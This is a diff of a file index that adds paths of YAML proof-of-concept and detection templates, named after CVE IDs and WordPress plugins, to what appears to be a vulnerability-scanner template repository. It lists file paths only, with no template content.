./poc/cve/CVE-2024-7054-b9029eac922ff3ca5bc6805910a1e977.yaml ./poc/cve/CVE-2024-7054.yaml @@ -42045,6 +42074,7 @@ ./poc/cve/CVE-2024-7302.yaml ./poc/cve/CVE-2024-7304-6a941a094e752d8bf903d3ab424b756b.yaml ./poc/cve/CVE-2024-7304.yaml +./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml ./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml ./poc/cve/CVE-2024-7317.yaml ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml @@ -42079,11 +42109,13 @@ ./poc/cve/CVE-2024-7414.yaml ./poc/cve/CVE-2024-7416-efec572b361a709c15a62ccf6c7c8234.yaml ./poc/cve/CVE-2024-7416.yaml +./poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml ./poc/cve/CVE-2024-7420-5be6d8b9afb78ab58d15b1426a2e4662.yaml ./poc/cve/CVE-2024-7420.yaml ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml +./poc/cve/CVE-2024-7447.yaml ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml ./poc/cve/CVE-2024-7484.yaml ./poc/cve/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml @@ -42109,12 +42141,15 @@ ./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml ./poc/cve/CVE-2024-7568.yaml ./poc/cve/CVE-2024-7573-1a1ac6c491c263147852f33621881cc9.yaml +./poc/cve/CVE-2024-7573.yaml ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml ./poc/cve/CVE-2024-7574.yaml ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml ./poc/cve/CVE-2024-7588.yaml ./poc/cve/CVE-2024-7590-19260509de237ee0e6fc84e2c1694cfb.yaml ./poc/cve/CVE-2024-7590.yaml +./poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml +./poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml ./poc/cve/CVE-2024-7621.yaml ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml @@ -42184,6 +42219,8 @@ ./poc/cve/CVE-2024-7850.yaml ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml ./poc/cve/CVE-2024-7854.yaml +./poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml +./poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml ./poc/cve/CVE-2024-7860-7bfa7ad373e4b2369c7238a1709273fe.yaml ./poc/cve/CVE-2024-7860.yaml ./poc/cve/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml @@ -42191,18 +42228,28 @@ ./poc/cve/CVE-2024-7862-0efbcc5b1f2d84d6982c89d56528850a.yaml ./poc/cve/CVE-2024-7862.yaml ./poc/cve/CVE-2024-7863-d3242f03e4b845277a7311f26e80d2a3.yaml +./poc/cve/CVE-2024-7863.yaml +./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml +./poc/cve/CVE-2024-8030.yaml +./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml +./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml ./poc/cve/CVE-2024-8046.yaml +./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml +./poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml +./poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml ./poc/cve/CVE-2024-8054-3cc73472d29ef86c20298b7294006219.yaml ./poc/cve/CVE-2024-8054.yaml ./poc/cve/CVE-2024-8056-9a2f1d50842378dfbd24cfe6b36f0b56.yaml ./poc/cve/CVE-2024-8056.yaml +./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml +./poc/cve/CVE-2024-8195.yaml ./poc/cve/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/cve/CVE-2024-8197.yaml ./poc/cve/CVE-2024-8199-0aa4becb897b22474a7caa43aa9de6d0.yaml @@ -52182,6 +52229,7 @@ ./poc/detect/sage-detect-9977.yaml ./poc/detect/sage-detect.yaml ./poc/detect/salesforce-aura-detect.yml +./poc/detect/salesforce-contentdocument-detector.yaml ./poc/detect/salesforce-credentials-detect.yml ./poc/detect/samba-detect-9988.yaml ./poc/detect/samba-detect-9989.yaml @@ -58381,6 +58429,7 @@ ./poc/microsoft/arforms-26fe806013e504007c55ee9bcfa2e17f.yaml ./poc/microsoft/arforms-2a84b95c6af8ac3490d174013ff0e55e.yaml ./poc/microsoft/arforms-4c2c7eaf0ffa73d26ccfcad83f902cf6.yaml +./poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml ./poc/microsoft/arforms-9dcfc8d60c705c589e8c6830bc121023.yaml ./poc/microsoft/arforms-d0ccd43103166ffa3ebb9f8ca68d4b35.yaml ./poc/microsoft/arforms-de420f12fa5b8ba5eb02c47236a604c8.yaml @@ -58946,6 +58995,7 @@ ./poc/microsoft/funnelforms-free-af02e5854a895e2a81d66025bba334eb.yaml ./poc/microsoft/funnelforms-free-b8072e17b22a3f23d6009926407bbb88.yaml ./poc/microsoft/funnelforms-free-c836a3d7c01c45d13328a529fe028d13.yaml +./poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml ./poc/microsoft/funnelforms-free-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/funnelforms-free-plugin.yaml ./poc/microsoft/funnelforms-free.yaml @@ -59831,6 +59881,7 @@ ./poc/microsoft/snow-monkey-forms-b870dfd4deccc70c5aa8363616a97294.yaml ./poc/microsoft/snow-monkey-forms.yaml ./poc/microsoft/social-msdn.yaml +./poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml ./poc/microsoft/sqli-vuln-params-deep.yaml ./poc/microsoft/sqli-vuln-params.yaml ./poc/microsoft/ssrf-vuln-params.yaml @@ -59934,6 +59985,7 @@ ./poc/microsoft/views-for-wpforms-lite-e1e6ef7422e9825abd84f53bc49fe1ad.yaml ./poc/microsoft/views-for-wpforms-lite-feeee6243e2c0dd8545fdb4bfc1c6f95.yaml ./poc/microsoft/views-for-wpforms-lite.yaml +./poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml ./poc/microsoft/vmstio-mastodon-instance.yaml ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/microsoft/vospari-forms.yaml @@ -62901,6 +62953,7 @@ ./poc/other/ai-engine-1eab670c9904ae9ad196227a107b8626.yaml ./poc/other/ai-engine-31c4e72796ef84f57eeac02cdfb2c906.yaml ./poc/other/ai-engine-3a9b23c9556cad6d3fcaec0a0bacdf86.yaml +./poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml ./poc/other/ai-engine-c182dd6752641ac5204307ceb38c0446.yaml ./poc/other/ai-engine-c6a6622e05cafbce41ce40b2860abe7d.yaml ./poc/other/ai-engine-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -64257,6 +64310,7 @@ ./poc/other/auxin-elements-plugin.yaml ./poc/other/auxin-elements.yaml ./poc/other/auxin-portfolio-4265e0732bc9685cf1e2090597ba0651.yaml +./poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml ./poc/other/auxin-portfolio-aad1583ff5243a02a6a3df48947d3849.yaml ./poc/other/auxin-portfolio.yaml ./poc/other/auxin-shop-73b3278144ae687a0950408e692f512b.yaml @@ -64750,6 +64804,7 @@ ./poc/other/beaver-builder-lite-version-5b42cfef5da69a9668244c9c487eca3c.yaml ./poc/other/beaver-builder-lite-version-61ae33d7c990a629b171160654bc6e2e.yaml ./poc/other/beaver-builder-lite-version-6229d60925190e54ee6d1e7dfb1b109a.yaml +./poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml ./poc/other/beaver-builder-lite-version-8fb79d694642d9144754619ceddfad1c.yaml ./poc/other/beaver-builder-lite-version-9031f2623733acade8c80c6f38217e78.yaml ./poc/other/beaver-builder-lite-version-96760c012f66a04ff7ddf7d14acc05e8.yaml @@ -65348,6 +65403,7 @@ ./poc/other/booking-system-5ca35f110e7f139c43edd414d499b711.yaml ./poc/other/booking-system-61584ec0391f5ec65a361a7822426d2a.yaml ./poc/other/booking-system-85504272f234bfb9e971fc1ed126d991.yaml +./poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml ./poc/other/booking-system-936593a221fe0a9be355a3ef42dc7754.yaml ./poc/other/booking-system-c858eff2796d9fd91084c99d73ede84f.yaml ./poc/other/booking-system-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -66823,6 +66879,7 @@ ./poc/other/chained-quiz-cfac973be4435abc14e53ab3918e8897.yaml ./poc/other/chained-quiz-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/chained-quiz-d9e0ca31c69ddc9adc6aa3461bc17cae.yaml +./poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml ./poc/other/chained-quiz-e80947e0f5efe37249f4a862fc8303ad.yaml ./poc/other/chained-quiz-f8ecf6d2cdf4b1f49c0d4934987326ef.yaml ./poc/other/chained-quiz-fd2eed70f50ca774614b0a0fab8af1f4.yaml @@ -69706,6 +69763,7 @@ ./poc/other/ditty-news-ticker-3df7579faeed40129add08a0c00a9e28.yaml ./poc/other/ditty-news-ticker-5c7fc09c612e6c5bfb7efa77dd1a0500.yaml ./poc/other/ditty-news-ticker-6c0ac7a495344322f6c300dcc6f855c0.yaml +./poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml ./poc/other/ditty-news-ticker-79dd41cd4825dcf2ffc30e6a350d64a1.yaml ./poc/other/ditty-news-ticker-a3f5dfe9920983a4a38befdd195d7849.yaml ./poc/other/ditty-news-ticker-a92ba7f8446645be5de52349fb64fddd.yaml @@ -73571,6 +73629,7 @@ ./poc/other/front-end-only-users-42a6deb31b014ad8ea5c1c5adfffc764.yaml ./poc/other/front-end-only-users-51fc59980506bded179e7076785b2fa5.yaml ./poc/other/front-end-only-users-86ce913487fd084ff54b35448082b5a9.yaml +./poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml ./poc/other/front-end-only-users-bae8101474847a727907e55725750ef1.yaml ./poc/other/front-end-only-users-be56f44b1886aa91b452736929be6d20.yaml ./poc/other/front-end-only-users-d0ee2ea71060210abcdd3e8ff88d5a02.yaml @@ -73653,6 +73712,7 @@ ./poc/other/funnel-builder-03ab81e64f7fe608d6bf74784a682e15.yaml ./poc/other/funnel-builder-0c29b10ac5f2b67025dc11e0e4e5b3d1.yaml ./poc/other/funnel-builder-35d0f48b25eee02d4a76c4aac611f3cf.yaml +./poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml ./poc/other/funnel-builder.yaml ./poc/other/furaffinity.yaml ./poc/other/furiffic.yaml @@ -74239,6 +74299,7 @@ ./poc/other/give-56fcb08335fa0e8d65d79e7d74662583.yaml ./poc/other/give-59e5b5852a8758d972786a870f288f8c.yaml ./poc/other/give-59f2c303d4c8e047a063b3768c858674.yaml +./poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml ./poc/other/give-608015e360b20b1e783be5bd38472a14.yaml ./poc/other/give-73f9df5cda1303cb8153339e758af542.yaml ./poc/other/give-791995e7fcc889e009711c543cbc6911.yaml @@ -75991,6 +76052,7 @@ ./poc/other/infographic-and-list-builder-ilist-cb68e3d0f3afd2e233b2cf11c375ecee.yaml ./poc/other/infographic-and-list-builder-ilist-fe821d6f962b3565934600d635d125e2.yaml ./poc/other/infographic-and-list-builder-ilist.yaml +./poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml ./poc/other/infomaster.yaml ./poc/other/infopro-system.yaml ./poc/other/information-operation-and-maintenance-support-system.yaml @@ -78971,6 +79033,7 @@ ./poc/other/media-library-categories.yaml ./poc/other/media-library-helper-7c452443c905a19a3f2ff0751c931385.yaml ./poc/other/media-library-helper.yaml +./poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml ./poc/other/media-library-plus-3c875a74cf089dc5f088b86f95d51a44.yaml ./poc/other/media-library-plus-6958e86a5f3260acb61e16cf3aefe65d.yaml ./poc/other/media-library-plus-798cf28296e1bc5f2617b863aa4a2416.yaml @@ -79552,6 +79615,7 @@ ./poc/other/mobile-menu-ff2bccbc0b229e94859e133ae9794789.yaml ./poc/other/mobile-menu.yaml ./poc/other/mobile-office-system.yaml +./poc/other/mobile-security-framework.yaml ./poc/other/mobilechief-mobile-site-creator-5f5cd897a0fd99c68ed3243116fd0eb9.yaml ./poc/other/mobilechief-mobile-site-creator-67366a910dc8a6b2a903a9cde298a7bd.yaml ./poc/other/mobilechief-mobile-site-creator-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -79813,6 +79877,7 @@ ./poc/other/mp3-music-player-by-sonaar-33bbd6d8e2227cc880a8f342a2153144.yaml ./poc/other/mp3-music-player-by-sonaar-574b1a0b1219c1f301e66aed3aa298fd.yaml ./poc/other/mp3-music-player-by-sonaar-83f590dd1d6d6590548d60ef5ab5a434.yaml +./poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml ./poc/other/mp3-music-player-by-sonaar-eaa11f6096352a7e30275d7b58eca2b6.yaml ./poc/other/mp3-music-player-by-sonaar-efcc42f71e59bbbbd35d93b5cb747af1.yaml ./poc/other/mp3-music-player-by-sonaar.yaml @@ -83138,6 +83203,7 @@ ./poc/other/premium-addons-pro.yaml ./poc/other/premium-blocks-for-gutenberg-44d7124985adf47ae8ba87fad38be29f.yaml ./poc/other/premium-blocks-for-gutenberg.yaml +./poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml ./poc/other/premium-seo-pack-light-version-19d07348fd99a9ad2e1c2603001a2ec9.yaml ./poc/other/premium-seo-pack-light-version-70f9035f25476959d09b902faa701941.yaml ./poc/other/premium-seo-pack-light-version-cbef76100ef4ab2ab9388eeffe1e56cd.yaml @@ -83897,6 +83963,7 @@ ./poc/other/quiz-master-next-9f3fecd6206083fbc65ab446e8ce0265.yaml ./poc/other/quiz-master-next-a0627a12afed72d234446d1f03dd9d3e.yaml ./poc/other/quiz-master-next-a1064d332d70630bcfc494d984cf417d.yaml +./poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml ./poc/other/quiz-master-next-a3d1d2b7f98adf4393f82161df14beb6.yaml ./poc/other/quiz-master-next-a4b5a4030f887b8f9433b81573197330.yaml ./poc/other/quiz-master-next-b602027d673c87da63f0c568c42161ef.yaml @@ -84082,6 +84149,7 @@ ./poc/other/rating-widget-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/rating-widget-plugin.yaml ./poc/other/rating-widget.yaml +./poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml ./poc/other/ravpage-b5a51590524092b47fea1bc58ca48251.yaml ./poc/other/ravpage.yaml ./poc/other/raw-get-query.yaml @@ -84402,6 +84470,7 @@ ./poc/other/registrations-for-the-events-calendar-3408c179f74dffb1eeed57c7a66c7291.yaml ./poc/other/registrations-for-the-events-calendar-9d435a74f26e51e47dad9dfdf9a139c2.yaml ./poc/other/registrations-for-the-events-calendar-a238c9d2ece472f17824de5d31d6069b.yaml +./poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml ./poc/other/registrations-for-the-events-calendar.yaml ./poc/other/registrations.yaml ./poc/other/reglevel-7cfd0127f9691842573b026b66abb98f.yaml @@ -88995,6 +89064,7 @@ ./poc/other/the-plus-addons-for-elementor-page-builder-e5d05f7bff385631c49a27037bd23b98.yaml ./poc/other/the-plus-addons-for-elementor-page-builder.yaml ./poc/other/the-post-grid-0c8d16610621e9c28d71eeb8c31f9fda.yaml +./poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml ./poc/other/the-post-grid-277b846f037661602a5cdf2cd4c5faa9.yaml ./poc/other/the-post-grid-464546bd928fff316990fcd5bd1064e7.yaml ./poc/other/the-post-grid-4b9860ffe0bf76a06c6e50adec3d7162.yaml @@ -91206,6 +91276,7 @@ ./poc/other/vikbooking-f3fd55810541d8ee7d830f7442150020.yaml ./poc/other/vikbooking-f641bf38657def40bf1f654bef54a22e.yaml ./poc/other/vikbooking.yaml +./poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml ./poc/other/vikrentcar-23ee5b490e4220043ba76780fe414977.yaml ./poc/other/vikrentcar-3b2d01d947709f6288c8a9939301b0c0.yaml ./poc/other/vikrentcar-434e6d40976c0b99f8a5b55bdcf33934.yaml @@ -92544,6 +92615,7 @@ ./poc/other/woo-products-widgets-for-elementor-42185b875105a7f60d9e9dab75c7a958.yaml ./poc/other/woo-products-widgets-for-elementor-899c764ee1e1018364a0620ec38aa86d.yaml ./poc/other/woo-products-widgets-for-elementor.yaml +./poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml ./poc/other/woo-razorpay-0b6ba0ef65091e980a007902aaeb38d9.yaml ./poc/other/woo-razorpay-6885c7666d38712333fe3571b0662f15.yaml ./poc/other/woo-razorpay-d37891a8b008c61565c4ae3febc9ba56.yaml @@ -93585,6 +93657,7 @@ ./poc/other/zephyr-project-manager-8ba2c39394e29aba6053c8c245fd4e4f.yaml ./poc/other/zephyr-project-manager-9463c1fa75789b96e3321b2f88104561.yaml ./poc/other/zephyr-project-manager-9f55f9a9396be5c13bf372d01a3cc1ee.yaml +./poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml ./poc/other/zephyr-project-manager-c31566302316f804e8d88462afc5b957.yaml ./poc/other/zephyr-project-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/zephyr-project-manager-d9aa28dd254164bdf23311d9c0563c2c.yaml @@ -96420,6 +96493,7 @@ ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml ./poc/remote_code_execution/salesforce-aura.yaml +./poc/remote_code_execution/salesforce-contentdocument-detector.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml ./poc/remote_code_execution/salesforce-credentials.yaml ./poc/remote_code_execution/salesforce-login.yaml @@ -96723,6 +96797,7 @@ ./poc/remote_code_execution/thinkphp-rce.yaml ./poc/remote_code_execution/thinkphp5-controller-rce.yaml ./poc/remote_code_execution/thinkphp5-rce-invokefunction.yaml +./poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-10a53bde52ea4e38b3796757c87f7919.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-2fe046cc3ef502058d32115ea2704f23.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-5392b5fdcfe0748b748f3428e0fd50d5.yaml @@ -98520,6 +98595,7 @@ ./poc/search/events-search-addon-for-the-events-calendar-ed564cf6d52fca31d8e377a3e7178e36.yaml ./poc/search/events-search-addon-for-the-events-calendar.yaml ./poc/search/exposed-elasticsearch.yaml +./poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml ./poc/search/fast-search-powered-by-solr-567141b8d4c166072ebecab73e5df591.yaml ./poc/search/fast-search-powered-by-solr-801c775ce138d2a8118318fc2430ec99.yaml ./poc/search/fast-search-powered-by-solr.yaml @@ -98601,6 +98677,7 @@ ./poc/search/premmerce-search-6477bf18cad6c823db485408d49b337b.yaml ./poc/search/premmerce-search.yaml ./poc/search/relevanssi-live-ajax-search-83bf0b123079e7cad5f57465205edb83.yaml +./poc/search/relevanssi-live-ajax-search.yaml ./poc/search/researchgate.yaml ./poc/search/ricerca-smart-search-4dd300604fbacb789cffd4c76bfe7480.yaml ./poc/search/ricerca-smart-search-50ed4a614d4d7b0510bf1cfaa59265ef.yaml @@ -102005,6 +102082,7 @@ ./poc/sql/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml ./poc/sql/CVE-2024-6928-66d36a40cf2172db26cce7deee6ee28d.yaml ./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml +./poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml ./poc/sql/CVE-2024-7092-4edc2efb8d8dec4f4786c242db407100.yaml ./poc/sql/CVE-2024-7145-4e8d81a353841cdd435dbb6eddfecc6d.yaml ./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml @@ -102014,7 +102092,9 @@ ./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml ./poc/sql/CVE-2024-7702-dea8b852582db90080db47397ce3b7b1.yaml ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml +./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml +./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/sql/Changdao-165-SQLi.yaml @@ -103872,6 +103952,7 @@ ./poc/sql/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make-267c13265a681f5c4a2cf3601cdb366d.yaml ./poc/sql/front-editor-32318705974ddbe58699ce6da10f1b94.yaml ./poc/sql/front-editor-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml ./poc/sql/front-end-pm-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/frontend-admin-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/frontend-dashboard-66dbd6260c14053dd1b309c0ab1ebd48.yaml @@ -104956,6 +105037,7 @@ ./poc/sql/pootle-page-builder-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pop-over-xyz-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/poptin-7cbdb58b6f86c99de893fc416e018237.yaml +./poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml ./poc/sql/popup-builder-a60ee164dbf87550705a98fa83f6ae1e.yaml ./poc/sql/popup-contact-form-d7fe7df201dbe46f7fb6353e363adf4f.yaml ./poc/sql/popup-maker-0c52a75ad214cf1ecd2425c783e32fdb.yaml @@ -105571,6 +105653,7 @@ ./poc/sql/sparky-d4430db8e030babb446d9f42ad29ad59.yaml ./poc/sql/sparrow-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/speakout-761656f8a016cc53b64260bc97dbd54a.yaml +./poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml ./poc/sql/specialist-4f16956bc96bf33cfaec7936ef1db49d.yaml ./poc/sql/speculor-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/speedycache-2daed6154db55b1ece0b0e9800fd0aea.yaml @@ -105802,6 +105885,7 @@ ./poc/sql/the-plus-addons-for-elementor-page-builder-ac1456fe699653adb559ef6428f8f32d.yaml ./poc/sql/the-plus-addons-for-elementor-page-builder-db6d6e5d12628c106e7955a2ccfde5c2.yaml ./poc/sql/the100-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml +./poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml ./poc/sql/theme-translation-for-polylang-1e37a3d3db98482fdc846a90f25f0289.yaml ./poc/sql/themeisle-companion-3d37064e8dba0102789bdb52c9f67daf.yaml ./poc/sql/themeisle-companion-755da964edb520d5cfbbb5a99c28095b.yaml @@ -105823,6 +105907,7 @@ ./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-db-disclosure.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml +./poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml ./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/tickera-event-ticketing-system-6477bf18cad6c823db485408d49b337b.yaml @@ -107059,6 +107144,7 @@ ./poc/sql/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml ./poc/sql/zentao-16.5-SQL-Injection.yaml ./poc/sql/zephyr-project-manager-2344c6e5fd2a6b33bef79b4dfdb6641f.yaml +./poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml ./poc/sql/zephyr-project-manager-4b9092681d332cddbaffb74a02cdb2b5.yaml ./poc/sql/zephyr-project-manager-e7a921458cccf631ca4f612750bdb52e.yaml ./poc/sql/zero-spam-sqli.yaml @@ -111390,6 +111476,7 @@ ./poc/wordpress/geo-my-wp-369c2b051f106d2bb102fee948bdb8e7.yaml ./poc/wordpress/geo-my-wp-548422f8989b37ce1d1ac6c188ba749b.yaml ./poc/wordpress/geo-my-wp-ce1accf0fb8e48be29e3b6b0d1821078.yaml +./poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml ./poc/wordpress/geo-my-wp.yaml ./poc/wordpress/go-fetch-jobs-wp-job-manager-0c1491d6d26301d18ac9c26473774100.yaml ./poc/wordpress/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml @@ -113278,6 +113365,7 @@ ./poc/wordpress/wp-accessibility-5a4b67d28c6affe4e8b4eb15f2d72cff.yaml ./poc/wordpress/wp-accessibility-68bab414f6d09e1ff81daed6d68d82ef.yaml ./poc/wordpress/wp-accessibility-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml ./poc/wordpress/wp-accessibility-helper-631a78cfce362ea68ad18c1ab69ad468.yaml ./poc/wordpress/wp-accessibility-helper-892bd5ca7de4322007f47099d5b24ea3.yaml ./poc/wordpress/wp-accessibility-helper-999f2c639849929d4e26b2843e78f083.yaml @@ -116603,6 +116691,7 @@ ./poc/wordpress/wp-simple-fields-lfi-11570.yaml ./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-fields-lfi.yaml +./poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml ./poc/wordpress/wp-simple-firewall-4f7bee968b7be1bbc933652a546908b5.yaml ./poc/wordpress/wp-simple-firewall-5843a59deee1d98f848220c24385547a.yaml @@ -117060,6 +117149,7 @@ ./poc/wordpress/wp-table-6bfac4f1efb2b97f1bd23e30846a82a5.yaml ./poc/wordpress/wp-table-builder-05c315c45c3d1e8458984521e6889db5.yaml ./poc/wordpress/wp-table-builder-084e237595f73d4c571f4d7a74f44e0b.yaml +./poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml ./poc/wordpress/wp-table-builder-11e6571d10bdd880ac43ae2729655450.yaml ./poc/wordpress/wp-table-builder-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-table-builder-9118e8a75fb38be0239c547007b0913f.yaml @@ -117090,6 +117180,8 @@ ./poc/wordpress/wp-terms-popup-1cce07d804e627ef58aa1266e2d0d645.yaml ./poc/wordpress/wp-terms-popup.yaml ./poc/wordpress/wp-testimonial-widget-29c6802974791f322cc3fd42a505c031.yaml +./poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml +./poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml ./poc/wordpress/wp-testimonial-widget.yaml ./poc/wordpress/wp-testimonial-with-widget-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/wordpress/wp-testimonial-with-widget.yaml @@ -117159,6 +117251,7 @@ ./poc/wordpress/wp-todo-373706a9820bd82046ddaa5eeff2947c.yaml ./poc/wordpress/wp-todo-5d069e25b5a6761ea751204d9f5b6048.yaml ./poc/wordpress/wp-todo-c0fc1554d83ed2b9e576dd46621a84ca.yaml +./poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml ./poc/wordpress/wp-todo-e44bda3693a81f3f18131b340bc4f678.yaml ./poc/wordpress/wp-todo-e6681fd7518c30d2f63e3e203e24e33f.yaml 